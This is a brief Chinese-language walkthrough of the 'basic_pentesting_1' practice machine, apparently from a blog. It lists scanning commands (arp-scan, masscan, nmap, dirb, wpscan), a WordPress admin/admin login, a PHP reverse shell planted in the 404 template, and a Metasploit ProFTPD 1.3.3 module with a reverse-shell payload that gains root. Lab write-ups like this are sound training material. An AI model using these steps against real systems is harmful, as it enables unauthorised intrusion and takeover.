靶机来源-basic_pentesting_1【VX订阅号:0x00实验室】

basic_pentesting_1【VX订阅号:0x00实验室】

arp-scan扫描靶机IP

masscan 192.168.253.153 --ports 0-65535 --rate=10000端口扫描

nmap扫描nmap -T5 -A -p- 192.168.253.153

21:ProFTPD 1.3.3

dirb http://192.168.253.153 目录扫描

http://192.168.253.153/secret/发现网站cms是wordpress

wpscan --url http://192.168.253.153/secret/

知道版本WordPress 4.9.24

msf没发现可利用漏洞

wpscan --url http://192.168.253.153/secret/ --enumerate u用户名枚举

admin/admin直接进来了

404界面写入phpshell

shell:反弹的phpwebshellphp-reverse-shell.php 默认目录及文件名/usr/share/webshells/php

把IP和port改成自己的,监听反弹

404监听不行,监听不到
WordPress 6.4.1

上传可以

在上传路径找到自己上传文件

换个方法

ftp端口开着

ProFTPD

搜索可利用模块search ProFTPD 1.3.3

设置payload,输入set payload cmd/unix/reverse、

设置目的地址和源地址

运行

获得root权限

相关推荐
用户962377954484 天前
VulnHub DC-3 靶机渗透测试笔记
安全
叶落阁主5 天前
Tailscale 完全指南:从入门到私有 DERP 部署
运维·安全·远程工作
用户962377954487 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机7 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机7 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954487 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star7 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954487 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher9 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行12 天前
网络安全总结
安全·web安全